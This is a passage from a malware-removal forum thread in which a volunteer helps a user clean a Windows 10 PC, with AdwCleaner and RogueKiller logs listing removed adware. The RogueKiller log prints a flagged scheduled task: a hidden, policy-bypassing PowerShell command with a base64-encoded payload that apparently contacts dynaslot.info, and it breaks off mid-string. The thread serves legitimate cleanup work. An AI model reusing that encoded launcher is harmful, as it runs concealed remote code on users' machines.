Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\YeaDesktop
Deleted: [Key] - HKCU\Software\YeaDesktop
Deleted: [Value] - HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|YeaDesktop.exe
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION|YeaDesktop.exe
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\MinerGate
Deleted: [Key] - HKCU\Software\MinerGate
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\FastDataX
Deleted: [Key] - HKCU\Software\FastDataX
Deleted: [Key] - HKLM\SOFTWARE\RunBooster
Deleted: [Key] - HKLM\SOFTWARE\Microleaves
Deleted: [Key] - HKLM\SOFTWARE\Essentware
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Essentware
Deleted: [Key] - HKCU\Software\Essentware
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B2CD1132-75C5-427F-8B06-9DA507A5A2B6}
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\APPID\PCKElevatedHost.exe
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\APPID\PCKElevatedHost.exe
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\*\SHELLEX\CONTEXTMENUHANDLERS\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\*\SHELLEX\CONTEXTMENUHANDLERS\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\csastats
Deleted: [Key] - HKCU\Software\csastats
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\PRODUCTSETUP
Deleted: [Key] - HKCU\Software\PRODUCTSETUP
Deleted: [Key] - HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-9

# AdwCleaner 7.0.4.0 - Logfile created on Mon Nov 20 07:23:45 2017
# Updated on 2017/27/10 by Malwarebytes
# Running on Windows 10 Home Single Language (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

Deleted: PCKAVService


***** [ Folders ] *****

Deleted: C:\ProgramData\Host App Service
Deleted: C:\ProgramData\Application Data\Host App Service
Deleted: C:\Users\All Users\Host App Service
Deleted: C:\Users\BOSS TSAPO\AppData\Local\Host App Service
Deleted: C:\Users\Default\AppData\Local\Host App Service
Deleted: C:\Users\Default User\AppData\Local\Host App Service
Deleted: C:\Users\DefaultAppPool\AppData\Local\Host App Service
Deleted: C:\Users\BOSS TSAPO\AppData\Roaming\WMPNetworkAcSvc
Deleted: C:\ProgramData\WinZip\WinZip Smart Monitor
Deleted: C:\ProgramData\Application Data\WinZip\WinZip Smart Monitor
Deleted: C:\Users\All Users\WinZip\WinZip Smart Monitor
Deleted: C:\Program Files\WinZip Smart Monitor
Deleted: C:\Users\BOSS TSAPO\AppData\Local\AdvinstAnalytics
Deleted: C:\Program Files (x86)\WindowsTM
Deleted: C:\Users\All Users\Documents\XMUpdate
Deleted: C:\Users\Public\Documents\XMUpdate
Deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft\WebCompanion
Deleted: C:\Users\BOSS TSAPO\AppData\Local\PCBooster
Deleted: C:\ProgramData\Microleaves
Deleted: C:\ProgramData\Application Data\Microleaves
Deleted: C:\Program Files (x86)\Microleaves
Deleted: C:\Users\All Users\Microleaves
Deleted: C:\Users\BOSS TSAPO\AppData\Roaming\Microleaves
Deleted: C:\ProgramData\Essentware
Deleted: C:\ProgramData\Application Data\Essentware
Deleted: C:\Program Files\Essentware
Deleted: C:\Users\All Users\Essentware
Deleted: C:\\Users\Public\Documents\XMUpdate
Deleted: C:\ProgramData\1e164d5f
Deleted: C:\ProgramData\9463ebbb-3123-1
Deleted: C:\ProgramData\9463ebbb-6ff7-0
Deleted: C:\ProgramData\bda2b42c-0fa5-1
Deleted: C:\ProgramData\bda2b42c-5313-0
Deleted: C:\ProgramData\{318d22ec-212c-1}
Deleted: C:\ProgramData\{5a7c27e3-012c-0}


***** [ Files ] *****

Deleted: C:\Windows\SysNative\drivers\zeoscanner.sys
Deleted: C:\Windows\SysNative\lanmamasterHelp.dll
Deleted: C:\Users\BOSS TSAPO\appdata\local\installationconfiguration.xml
Deleted: C:\Users\BOSS TSAPO\AppData\Roaming\Mozilla\Firefox\Profiles\2gwlwnaw.default\searchplugins\yahoo-lavasoft.xml
Deleted: C:\Users\BOSS TSAPO\AppData\Local\PO.DB
Deleted: C:\Users\All Users\Desktop\MediaPlayAir.lnk
Deleted: C:\Users\Public\Desktop\MediaPlayAir.lnk


***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

Cleaned: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk[http:\\pop.yeawindows.com\]
Cleaned: C:\Users\BOSS TSAPO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk[http:\\pop.yeawindows.com\]
Cleaned: C:\Users\Public\Desktop\Google Chrome.lnk[http:\\pop.yeawindows.com\]


***** [ Tasks ] *****

Deleted: App Explorer
Deleted: ShadowsocksS
Deleted: FastDataX Task
Deleted: PCKeeper updater
Deleted: Updater_Online_Application
Deleted: DllKitPRO
Deleted: Updater_Online_Application


***** [ Registry ] *****

Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\utop.it
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\utop.it
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E7E7B26A-88AA-48B0-A47C-173C062FD904}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E44BBEE3-3F83-4670-9E2E-EE0556442287}
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Host App Service
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted: [Key] - HKCU\Software\Host App Service
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted: [Key] - HKLM\SOFTWARE\Lavasoft\Web Companion
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Lavasoft\Web Companion
Deleted: [Key] - HKCU\Software\Lavasoft\Web Companion
Deleted: [Key] - HKLM\SOFTWARE\SkypeUpdateEx
Deleted: [Key] - HKLM\SOFTWARE\WMPNetworkAcSvc
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WindowsTM
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{990F7D4F-09EF-47DF-9ABE-BAF2DCCF5C4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{CF6E1E3B-5B36-4A71-9105-DC75B4089D8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{CF6E1E3B-5B36-4A71-9105-DC75B4089D8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{0319DE47-F039-45DC-A213-DBB61C6AE509}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{0319DE47-F039-45DC-A213-DBB61C6AE509}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{074BFF31-CA38-43C4-8F25-79213AD708EF}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{074BFF31-CA38-43C4-8F25-79213AD708EF}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{0D838143-D511-4555-8B97-16C3CF5A780D}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{0D838143-D511-4555-8B97-16C3CF5A780D}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{16A94A89-66C4-4990-896C-5FC3E1557FFD}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{206E5E13-3B8F-4146-9C21-F18A63A9689B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{206E5E13-3B8F-4146-9C21-F18A63A9689B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{2B5E8E95-F503-4530-A340-53DE89F3358F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{2B5E8E95-F503-4530-A340-53DE89F3358F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{2F8F99FD-7C0E-4150-8DFD-13B1F4FBD916}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{33B2A2E0-18F6-45CB-8080-04320066A4A1}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{40B50C00-06BB-415F-8F4E-6DEF53957ABA}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{40B50C00-06BB-415F-8F4E-6DEF53957ABA}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{503F82AB-1549-4B08-AF10-289CCCF3BE4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{6AF595D6-D4A0-4ACA-ADD4-62034EE9FF3A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{6F09F687-2C4C-4A37-8D7A-2CB76D2B3F71}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{6F09F687-2C4C-4A37-8D7A-2CB76D2B3F71}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{723F0E89-F10C-4D28-A46C-934513EA963A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{7944171A-50CC-479E-A6FC-B1E25E665C25}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{7A2BA8C4-F382-4DD1-A6D2-A86C6D66C4F9}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{7A2BA8C4-F382-4DD1-A6D2-A86C6D66C4F9}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{80E9CB05-9C8B-4B85-8A66-D81092F5AF60}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{817BF5D8-380E-44F4-8E61-43E7ECF74B53}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{828FB706-5749-4255-862F-3D30FCF017E1}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{828FB706-5749-4255-862F-3D30FCF017E1}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{8888A22B-3380-4C2B-950F-A5B6EC527A4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{8888A22B-3380-4C2B-950F-A5B6EC527A4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{9443C19D-B318-4EBD-8A7F-6A50D0472FB4}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{95CAD169-7912-410E-8C8A-7BA1729BD8F7}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{B462C1CA-E368-4321-B0B1-0453E4AB6FDB}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{CCF68051-721D-40C7-812D-86ED0FDE7411}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{D8F2F7F9-F8F3-4562-9FDA-C1E2DAE60A30}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{D8F2F7F9-F8F3-4562-9FDA-C1E2DAE60A30}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{DEE0443A-95B1-41DF-B50A-409FDEA53644}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{F55EA208-E122-4B4E-8483-4404A1CC9569}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{F6649783-7559-4772-96C7-02D33BEACD8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{F6649783-7559-4772-96C7-02D33BEACD8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{D062B23B-F8EE-40EC-BF3F-7DB0E9FE1232}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{D3F79FC5-65FE-4650-8979-3BF0CCF02C1A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{05562BE7-0EFC-4BD2-BD8F-FAA363E68410}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{05562BE7-0EFC-4BD2-BD8F-FAA363E68410}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{B52115B1-936F-4EEA-A363-A535FB1942B7}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{B52115B1-936F-4EEA-A363-A535FB1942B7}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{56AD7EEE-D6C0-410E-8A7B-811DEA764554}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{E8EB2F1F-661E-4A7F-8F9A-77DEB757A906}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{AF85DB83-06F2-4ECF-97CF-C46EDB06BE29}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Features\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Products\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|YeaDesktop
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|Web Companion
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeper Antivirus
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|PCKeeper Antivirus
Deleted: [Value] - HKCU\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeper Antivirus
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeperLive
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|PCKeeperLive
Deleted: [Value] - HKCU\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeperLive
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\PCKeeperShell64
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\YeaDesktop
Deleted: [Key] - HKCU\Software\YeaDesktop
Deleted: [Value] - HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|YeaDesktop.exe
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION|YeaDesktop.exe
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\MinerGate
Deleted: [Key] - HKCU\Software\MinerGate
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\FastDataX
Deleted: [Key] - HKCU\Software\FastDataX
Deleted: [Key] - HKLM\SOFTWARE\RunBooster
Deleted: [Key] - HKLM\SOFTWARE\Microleaves
Deleted: [Key] - HKLM\SOFTWARE\Essentware
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Essentware
Deleted: [Key] - HKCU\Software\Essentware
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B2CD1132-75C5-427F-8B06-9DA507A5A2B6}
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\APPID\PCKElevatedHost.exe
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\APPID\PCKElevatedHost.exe
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\*\SHELLEX\CONTEXTMENUHANDLERS\PCKeeperShell32
Deleted: [Key] - HKLM\SOFTWARE\CLASSES\*\SHELLEX\CONTEXTMENUHANDLERS\PCKeeperShell64
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\csastats
Deleted: [Key] - HKCU\Software\csastats
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\PRODUCTSETUP
Deleted: [Key] - HKCU\Software\PRODUCTSETUP
Deleted: [Key] - HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}


***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

Plugin deleted: MSN Homepage & Bing Search Engine -
Plugin deleted: Quick Searcher v16.2 -


*************************

::Tracing keys deleted
::Winsock settings cleared
::Additional Actions: 0



*************************

C:/AdwCleaner/AdwCleaner[S0].txt - [16518 B] - [2017/11/20 7:21:10]


########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt ##########



THank you Kevin, i followed each and evry step but the problem is still there

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #10 on: November 20, 2017, 02:18:31 AM »
Thanks for those logs feelityd08, did you also run MRST, can I see that log.

Continue with the following:

Download RogueKiller and save it on your desktop, ensure to download correct version..

RogueKiller (X86)

RogueKiller (x64)

  • Exit all running applications.
  • Double-click on RogueKiller.exe to launch the tool. On its first execution, RogueKiller will disply the software license (EULA), click on "Accept" to continue.
  • If RogueKiller is unable to load,  do not hesitate to try launching it several times or rename it winlogon.
  • Click "Start Scan" to begin the analysis. This may take some time.
  • Once the scan is complete, click the "Open TXT" button to display the scan report.
  • Copy/Paste it's content in your next reply.

Do not use the Remove Selected option until i`ve had a look at the log..

Thank you,

Kevin...

« Last Edit: November 20, 2017, 03:14:53 AM by kevinf80 »

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #11 on: November 20, 2017, 09:51:06 AM »
RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : BOSS TSAPO [Administrator]
Started from : C:\Users\BOSS TSAPO\Downloads\RogueKiller_portable64.exe
Mode : Delete -- Date : 11/20/2017 16:10:19 (Duration : 01:19:51)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 8 ¤¤¤
[PUP.WindowsTM] (X64) HKEY_CLASSES_ROOT\CLSID\{BFD6B750-C600-456A-BB8F-FA18D10F2C1B} (C:\Program Files (x86)\WindowsTM\TMDeskBand.dll) -> Deleted
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\IM -> Deleted
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\IM -> Not selected
[PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\ZeoScanner (system32\DRIVERS\zeoscanner.sys) -> Deleted
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://lenovo15.msn.com/?pc=LCTE  -> Not selected
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://lenovo15.msn.com/?pc=LCTE  -> Not selected
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve  -> Not selected
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve  -> Not selected

¤¤¤ Tasks : 2 ¤¤¤
[Suspicious.Path] \DecBOSS TSAPO -- C:\Users\BOSSTS~1\AppData\Local\Temp\revopartner.tmp -> Deleted
[Mal.Powershell] \{797E0947-0E7E-0F0F-7911-0E0C7A05110D} -- C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAOwA7ACAAIAA7ACAAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABWAGUAcgBiAG8AcwBlAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQARABlAGIAdQBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7AAoAZgB1AG4AYwB0AGkAbwBuACAAVwBLAEcAWgBIAEUAUABDAFEAUQBBACgAJABwACkAewAkAG4APQAiAFcAaQBuAGQAbwB3AFAAbwBzAGkAdABpAG8AbgAiADsAdAByAHkAewBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAfABPAHUAdAAtAE4AdQBsAGwAOwB9AGMAYQB0AGMAaAB7ADsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewA7AH0AIAB9AAoAfQBXAEsARwBaAEgARQBQAEMAUQBRAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAVwBLAEcAWgBIAEUAUABDAFEAUQBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAVwBLAEcAWgBIAEUAUABDAFEAUQBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGQAeQBuAGEAcwBsAG8AdAAuAGkAbgBmAG8ALwB1AC8APwBhAD0AbwBjAFgAegBlAEsAagBDAGEAWgBCAHkAcQB5AEQAOABVAHUAVABzAE0AdwBJAEsAVwBFAGMAQgB1AFQAcQBpAFQAdABjAEUAVQBZAHAAZwBYAHkAagA2AC0AbgBjADMAcQBiAGYAdABlAFoAUwBmAG8ATQBZAHoARABRAFIAQwAyAEwARwBrAFMATwBjAFIANgBPAFUARgBlAEoAWQBDAGsAYwAwAHMAZABjADkAUgBMADUAXwBLADkAbQBtAHkAUQBCAHYAdQBzAE0AaQBGAGIARQBoADEARQBIAGkAdABzAFYAMQBJADkARABkAG8ANgB6AHoAaQB2AGwARAB6AHgAQgAwAG0AbgAzAC0AeQB5AFoAQgA0AFIAWABRAEIAegBwAGwAagBxADAAOQBqAGUAYwBJAFcALQBaAEsAOABtAHkAMQBMAFkARwBOADkAdwBkADEASwAzAFEATQBuAG8ANABIAHkANwA4AGoASwB2ADkASABiAEwAbgByAHAAcgBGAGYAcQBCAFYAMgBWAHQAQQBkAG8AaAA3AGgAbQBXAHYAeAA0AEcATABOAEsAWABZAEYAWQB5ADYAQwBLADMAXwBMAGgAMwBfAEkAMwBsAE0ANAAwAFEAVQBOAG0AeQBJAFAASQBxAHIARwB0AHgAegB5ADYAdQB2AGIARwBiAC0AOABaAF8AUAAtAEUAZQBJAFoANQA5AHgAcAAxAG0ANQBfADkAZwBjAGoAVABXAGoANQBNAEEALQA5AHkAdQBYADEARAAyAEgARwBwAGsAcgBzADkASABPAE8ARgBuAHAAeAA1ADAAMAB4AGUAMwBSAF8AZQBpADMAbgA3AHcAdgBKAHEAdwBNAFcASwAtAGsAZgBkAE4AMgBxAFAAVABjAFgASQB1ADYAVABNAE0AUgBXADgAVQAxAGYAZABmAGQARQBDAEUARABj